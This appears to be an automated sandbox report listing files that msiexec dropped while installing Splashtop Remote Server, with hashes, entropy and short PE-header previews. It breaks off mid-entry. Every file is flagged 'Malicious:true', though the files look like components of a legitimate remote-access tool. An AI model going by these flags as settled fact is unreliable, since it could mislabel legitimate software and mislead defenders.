                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......)r.3m..`m..`m..`.a.aa..`.a.a...`.a.av..`.g.ao..`"o.a|..`"o.ag..`"o.a#..`.a.a`..`m..`...`.o.ae..`.o.al..`.o{`l..`m..`l..`.o.al..`Richm..`........................PE..d...)..d.........." ...".:...`......l^......................................../.....M.0...`..........................................,.X...(.,......0/.h....P-......f/..(...@/.H... .*.p.....................*.(.....*.@............P...............................text...|8.......:.................. ..`.rdata..ZM...P...N...>..............@..@.data........,..p....,.............@....pdata.......P-.......,.............@..@_RDATA..\.... /.....................@..@.rsrc...h....0/.....................@..@.reloc..H....@/.....................@..B........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomUtil64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.549378989734658
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3mFO3OkMgk4tx/knVGuOA0R2dEpYiTPxchfU49:3SO3trenVODR2W7TPxchfUg
                                                                                                                                                                                                                                                                                                                                  MD5:48C3A4A2FA37A0BFC5BD90874A63AF44
                                                                                                                                                                                                                                                                                                                                  SHA1:27A3FBF2603B36DD972401CF8B976FBC282A2C3D
                                                                                                                                                                                                                                                                                                                                  SHA-256:3822BE932AED0A6E5C5A9F3CD80440AD96C8248F187F67324221A58AF5276296
                                                                                                                                                                                                                                                                                                                                  SHA-512:F261A54AF5B0204B8018B5844CDDA6BDC1F399AB3375BF171B8E7081A9BCA583D061F7182EA140E5E2A9E42916C78C2C7256AF516B15EC16AD51AD8ADFBC57EA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:..:..:..u[..:..BX..:..BN..:..BI..:..B^..:..:..:..BG..:..BY..:..B\..:.Rich.:.........PE..d......d.........."......*...(......,0.........@....................................<.....@..................................................L..d.......l....p..D....V...(......L....B...............................................@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........`.......D..............@....pdata..D....p.......F..............@..@.rsrc...l............L..............@..@.reloc...............T..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomCtrl32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2403848
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7207202597413875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:FgGdcX0zBXVSNi2z4xw4G7NyzRP1ikMHeBNWHr:F4X2ikxwTNsi7
                                                                                                                                                                                                                                                                                                                                  MD5:4CF09B45FEE4FD22DC22B0AF706E4D80
                                                                                                                                                                                                                                                                                                                                  SHA1:86A6E08A3F7C315F1FDE9A9499EE91EE6A0F1407
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D925CF495ED97B7B73F7A93B01F7C529B55EB4581479120D235DC9263D06A3D
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD4B8E15B5A2C0B5045F039E2498D1CEFA5BB4913E302C56E6B84526279D36378D87E9269435B5AF644BA019CF056BF47E818F192FDD9D35F1AC8CF8D6DDD531
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.q8.."8.."8.."...#*.."...#..."...#/.."...#:.."w..#).."w..#!.."w..#s.."...#5.."8.."..."...#0.."...#9.."..%"9.."8.M"9.."...#9.."Rich8.."........................PE..L......d...........!...".............W........................................$......$...@...........................".X...8."......`#.h.............$..(...p#..o....".p...................@."......".@............................................text............................... ..`.rdata..............................@..@.data...pr...."..N....".............@....rsrc...h....`#.......#.............@..@.reloc...o...p#..p....#.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomUtil32.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.708144938787245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:EJVI3R0H/aWeIUhwNslRPbJyRefvcO+mVMWehLNyb8E9VF6IYiTPxcbdGgktyVEF:EJKMC8NsLPtxcO+AMPlEpYiTPxchOF
                                                                                                                                                                                                                                                                                                                                  MD5:A958758134E6D61D45BA0C4968380A8B
                                                                                                                                                                                                                                                                                                                                  SHA1:F40142518B13782CD2A06844CD8147B337E459DA
                                                                                                                                                                                                                                                                                                                                  SHA-256:30FD28720C7235F45140ED0642A4C71FF0DB1E93362D5694D87026DDA14992F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:1645C335C36AAC6A6BD2A74E41F7176776E70B696705F491CA8CCD6E99A54C3ECBC52E8BA081E9B0E57F5C08E0546D5302A7D28D72C350EC08446D54457360D1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U(...I...I...I...Z..I...1Y..I...1O..I...1H..I...1_..I...I..sI...1F..I...1X..I...1]..I..Rich.I..........................PE..L......d.................&... .......+.......@....@.......................................@..................................F..d....`..l............J...(...p......pA...............................C..@............@..H............................text...K$.......&.................. ..`.rdata.......@.......*..............@..@.data...0....P.......:..............@....rsrc...l....`.......<..............@..@.reloc..4....p.......D..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Elevator.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):107312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.447984928648711
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:BTeWLZrzci/8dbquofWnRADp2y6hX2hbTYzLhrhkphDZ52DBXN+vl/DFS:BCWFfqbqaGnGzLhr82DBXN+v2
                                                                                                                                                                                                                                                                                                                                  MD5:BCEF2D42768A816AF7CD60391CBA3C0E
                                                                                                                                                                                                                                                                                                                                  SHA1:E17EC512C595318DC5F282CB73B71CFCB0B52A7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0EA236D80EFFA865F73E728D06790AB5583660EC915C979E8D96CAF692B6FE80
                                                                                                                                                                                                                                                                                                                                  SHA-512:389B36A464C417AAAE16A229F004A01D4F1EBC8F3D8E8A4D12B5AA82D9BA5EDE4A139B3999BAF1D9BF862D3B4BD5A6A0D89CC0A3561E8CA15EF19AA771DEE475
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r...r...r...{...f...{.......{...D...{...}...r.......{...p...l...s...{...s...Richr...........PE..L......U.....................l.......W.......0....@..................................0....@..................................\..........................0............2..............................@N..@............0...............................text............................... ..`.rdata...6...0...8..................@..@.data....-...p.......V..............@....rsrc................h..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\NvFBC.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.281018016209332
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:TMM1hIpiOe7unK1L0RW7Z4tk05ZpJBkkmN6/2EvK6k:TMM/hOeSK1DZ4tk0/B7OEvK6k
                                                                                                                                                                                                                                                                                                                                  MD5:8CED2B2F0E61A1BA20D63B24A41E1234
                                                                                                                                                                                                                                                                                                                                  SHA1:9731E2756EAB7A902DA1A72C0F1DC008425037C5
                                                                                                                                                                                                                                                                                                                                  SHA-256:44DB8AF61B92B39C805B136D2FB608D9D9082F051DDBD9AEE9E3A760B34EFF13
                                                                                                                                                                                                                                                                                                                                  SHA-512:087596DC595B786D74087BCEEA2F1A9B46F4EADCB1162201F32CB05B9BD207520C617AD849CD52788B5C2E579CF72B2B1BB7A5265D10B450B5E6FB8D17D1C07B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].mt...'...'...'v..'=..'v..'...'v..'q..'>+x'...'...'...'...'r..'v..'...'v..'...'v..'...'Rich...'........PE..L.....jP...........!................VE.......................................`...........@.........................`...........d............................@..P.......................................@...............t............................text...'........................... ..`.rdata...8.......:..................@..@.data... 1..........................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PinShortCut.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):91432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.020228136904558
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5UBy2mcawf1jBALblIkWHgMCtd+DIO6iUY:SyNcRjyLKGMCtd+DtDUY
                                                                                                                                                                                                                                                                                                                                  MD5:B510DA2C973FEB05803F124D0507D3A4
                                                                                                                                                                                                                                                                                                                                  SHA1:8F1344CEF1DB998698E1467AD22E30ED3BCE584B
                                                                                                                                                                                                                                                                                                                                  SHA-256:A39DEBD7558B4E769AC277A7D05B532318AB7774490310F76BDFE9E55240D9CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:AFC90D52B19B5E8186C62F5F1B720AB68EB34A997D3099824C7396FCC74D1ED76063BA1541FAAD999806BCFCC375909636E48EF36957157AAD766256B2999E6A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7.B.s.,.s.,.s.,.z...b.,.z...K.,.z.....,.z...`.,.s.-...,.z...w.,.m...r.,.z...r.,.Richs.,.................PE..L....^.R............................@9............@..................................?....@.....................................x....0..x;...........L..(....p..X.......................................@...............x............................text...7........................... ..`.rdata..N0.......2..................@..@.data...............................@....rsrc...x;...0...<..................@..@.reloc..z....p.......2..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PkgHelper.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):170960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.545608024132094
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:k4UWlA7/ZJoE1s76gv/vKnGStqzWTBflx+FOGqK1:PY7/3s76ginGS4zWTBQv
                                                                                                                                                                                                                                                                                                                                  MD5:27CA510E2DDFE647F742F98C2EC6A7F7
                                                                                                                                                                                                                                                                                                                                  SHA1:1F422E39770D9565460F881D078D8C335B678255
                                                                                                                                                                                                                                                                                                                                  SHA-256:41BA7791F830EFBDF5F942A0B6DCF98C6A7D37B7DC06EED21F86AFBED0215C9A
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACBF7A23FB033ADB314466324AF6D1C6F543F6FADB6439B3E80F35467432754396667C9CA511A4D8AC3178BB51CD61EA3D94755436EFA9231EA362282C5FA2E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9..Kv4..9...A7..9...A!..9...A&..9...A1..9...9...9...A(..9...A0..9...k6..9...A3..9..Rich.9..........PE..L...8-,Q...........!................L3...............................................h....@.........................@[......(S..<.......|.......................0....................................G..@...............l............................text............................... ..`.rdata...k.......l..................@..@.data...87...`.......J..............@....rsrc...|............b..............@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAdemWrapper.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):103432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.506978817245819
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ZHdKQFG0im9CyE0rWB4f/j7rvHLoFbGugan639SNxsWb8cdrAwxJ0pz2Bxnz7HxD:ZHu0im80GM//rvHiP6tSDr7J0uxnzV
                                                                                                                                                                                                                                                                                                                                  MD5:C7BFA03D3623CB5D6BDBAE1F74BE00DB
                                                                                                                                                                                                                                                                                                                                  SHA1:3E2006273153940B1BE991B2A34E29A968ACE73B
                                                                                                                                                                                                                                                                                                                                  SHA-256:A55839E5E0FF26BDE1618461EB0614D62C528B2C5F32660D169F0C23BABA1094
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD5E9A1AFF686FF53385A7D7A67BEF51946937D8212B03578D28D1DEE50F68C64542CCB61F32331BC72E8EB9A2967AFAF189A1F33712C170CC594EFDC578F3EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..r5.!5.!5.!. ?.!. ..!..f!7.!3m. '.!3m. !.!3m. ..!. #.!. ".!5.!..![m. 3.![m. 4.![mR!4.!5.:!4.![m. 4.!Rich5.!........PE..L...a..f...........!...&..................................................................@.........................`Q.......R..P.......x............l...(......T....A..p...................@B.......A..@...............l............................text...z........................... ..`.rdata..Jk.......l..................@..@.data........`.......H..............@....rsrc...x............T..............@..@.reloc..T............Z..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAgent.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2360840
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.767339982053931
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:p1mJqhrtmYH8J+O9EKuVT/0QMcRp1wNeHP35Edm5wm/HmsF8hP4g39tm06xg2atO:pcshrtm48JvmKo0DcRvD38+wm0e
                                                                                                                                                                                                                                                                                                                                  MD5:3796CC5C6401E84AC96808194FFAE284
                                                                                                                                                                                                                                                                                                                                  SHA1:A504F979AA111A38C444994257C069B88D9BB46C
                                                                                                                                                                                                                                                                                                                                  SHA-256:286BA3E210BFD4559E3EE7BAA8978F07C26C1615B3614399A981B9E3EAB13C26
                                                                                                                                                                                                                                                                                                                                  SHA-512:C42F7F35D0CDC8C17F930C3A497FC7E9DC62B4FE47892732310CF47F8E7E5F8153AB8FC50191E8460074203DBF9F4C22453799AF9AD27C578FB08CEEF26FE648
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........G..G..G....V......*_.w..N.k.F..A_..E..A_.R..A_.]..A_.$....[....F....b..G....)_.;..)_..F..G.x.F..)_.F..RichG..................PE..L......f...............&.....<......A.............@..........................0$......u$...@...................................!.T.....".P.............#..(...."..t......p...............................@...................@.!.`....................text............................... ..`.rdata...2.......4..................@..@.data...<....."..n....!.............@....rsrc...P....."......b".............@..@.reloc...t...."..v...h".............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRApp.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2841608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5412010416271835
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:mO1UibGwLENhR7QyocGwhBOmIDq4B+560n4qaLT+h1kHWxq:mO+XNhRcVpGURDqA+5Hn4qaWSW4
                                                                                                                                                                                                                                                                                                                                  MD5:D9DA63ECEC898430A27EF20D3D9F71FF
                                                                                                                                                                                                                                                                                                                                  SHA1:C7B072BA1FC98D20F5F3C8EBCCB6EFAF5AF72657
                                                                                                                                                                                                                                                                                                                                  SHA-256:22236E6ECF21C772759CEA279E38CDDC3D9D0F053BE6AABE5779C87EADD68B58
                                                                                                                                                                                                                                                                                                                                  SHA-512:A935F8803413CB499A4752715ED32964F229C02326AAE48DD2AF4B2B9FFA40A89AC300EEE78C0E9DD2561CBD4013F0240DB6E34D06BED5E689F8C383DB43CAE7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qX:.59T.59T.59T..KW.)9T..KP..9T..KQ..9T..KR.49T..KU..9T.59U.:T.3.P. 9T.3.W..9T.3.Q.8T.<A..?9T.[.]..9T.[...49T.59..49T.[.V.49T.Rich59T.........PE..L......f...............&............:.............@...........................+.......,...@.................................D.!.......".............4+..(...`).$a......p...............................@...............L............................text.............................. ..`.rdata...3.......4..................@..@.data...T.....!..n....!.............@....rsrc........"......,".............@..@.reloc..$a...`)..b....(.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppBS.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):530952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.637158893708293
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:SR5wni7OJvLV7M6zg5dVYq1IJ+/oeuAjTCrtiU4/+kwltmvxbTe:qwn1JvLVYfeGoRhvQ+kwaxbTe
                                                                                                                                                                                                                                                                                                                                  MD5:319014A843516CC029E07F11BB0A5146
                                                                                                                                                                                                                                                                                                                                  SHA1:3F2CF20351D393E89D1F7FBC22924F9E1AC33DEF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF4FF5D87C78C06370AEE98170B02D8C5AC87CD54CF9655D6ED84BDA0BD192AA
                                                                                                                                                                                                                                                                                                                                  SHA-512:53654577D266C1FF6C8F98223E7060FD3AB884E2207584DB0F83EAC96A7D2E1F4EB7F6647495FBBD380B807B6F3471398CDA96E3DFF67E648E643BDFE1B0969C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................~......~..............................~......~........................_.......7.............Rich............................PE..L......f...............&............J.............@..........................0............@.................................,...........(................(.......(......p...............................@...............,............................text............................... ..`.rdata..D...........................@..@.data...H#..........................@....rsrc...(...........................@..@.reloc...(.......*..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2856456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5271661525280535
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:okrslqzlrAwddGrXudKz6Tnt9XqAx/AC7j9GjM7WQ0Uv1kHWji5JNco5H:orGlr3jdK+Tnt9XqAx/AC7BGjM71JSW0
                                                                                                                                                                                                                                                                                                                                  MD5:B63DF355747338E06E472A3D30BD9CE6
                                                                                                                                                                                                                                                                                                                                  SHA1:F1E1B84B8D0249D34955B77BDD0D8C6D2246E2BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:4AF12C3F11AE88B52B52416741FE7C1126D80813B13C92636C1C252D5E42CE73
                                                                                                                                                                                                                                                                                                                                  SHA-512:1095E98F0BC92A9E8AACE253ABCC8FB16671B6E8BEB2E2F1B2033B70BF49692E9EFF3BB24C51D651F36300B0808F457C6F0867D7C32A3D7EE6D23E9DBABC4EE3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w..3...3...3....../..................2..........3......57..&...57..)...57.....]7......]7~.2...3...2...]7..2...Rich3...................PE..L......f...............&.R...r......6I.......p....@...........................,.......,...@...................................!......0"..d...........n+..(....)..^...+..p...................@,.......+..@............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data........`!..l...<!.............@....rsrc....d...0"..f....!.............@..@.reloc...^....)..`....).............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioChat.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2854920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.655192500146649
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:K0fF+cHeBuVNocARu+i2ORUREOf1ELzwDAIADtPAibCwwhAtDWNCYfYTdPGHe:K0d+pBgJWPeRU6Of1wzqAIADtPAibCwz
                                                                                                                                                                                                                                                                                                                                  MD5:095F7CF4ABA86266672BA8972CDA1C9C
                                                                                                                                                                                                                                                                                                                                  SHA1:3A562E6B23B8C4881CEA0B2309F913AF57D584DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:25070C09D7E56B3829C1FAB5D2F36B65E33A97F379428DCDA1A2D3A7954AE95F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D09AFD33C4F467B8B35F1C4402BFE45BE042E9D19E6D4F50CACBF632B54F3785C37B5B5F6E798CC5FA9D7089DCAA977735A747BF429A61B4E4A0C25E15A8821C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3\cOw=..w=..w=...O..k=...c..u=...c..u=...O..]=...O...=...O..u=...O..D=..w=...>..q...b=..q...m=..q....<......A=......v=..w=..u=......v=..Richw=..........PE..L......f...............&.....P....................@...........................,.....b.+...@.................................\_!......."..............h+..(....).<f...j..p....................k...... j..@............................................text............................... ..`.rdata..............................@..@.data.........!..l....!.............@....rsrc.........".......!.............@..@.reloc..<f....)..h....).............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioResample.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):126984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6650606845144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:mP5B8wltn9s2x5eSeKiifjo2QqEF+bppc1rHZ8krfFa:a5ds2x8Szi6jo2QbH5ykrda
                                                                                                                                                                                                                                                                                                                                  MD5:FE70EE5264DC2267434A0517BFE2DEF9
                                                                                                                                                                                                                                                                                                                                  SHA1:D40FE2DF3077E20F3B7280A1F7A068C80F310767
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E48F84FD93EABFC3477B761CAB68D723FEAA19BBC0F778C46D132362EC7C9D3
                                                                                                                                                                                                                                                                                                                                  SHA-512:20C7E961D73D1EABA627697069024D0A0BB36B7B5A618164AC99C58EC27482FEE57DCCCACFBA54DCC2F4DC44F185DE6520480ACC29BB4E24951069C627EC5020
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................'......'...|..'.......H......H......H.....'...........H.....H.....HX......0....H.....Rich...........PE..L...2..f...........!...&.,...................@............................................@....................................(........................(......4...(...p...........................h...@............@...............................text....*.......,.................. ..`.rdata...u...@...v...0..............@..@.data...x...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRChat.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2854920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.65520507084395
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
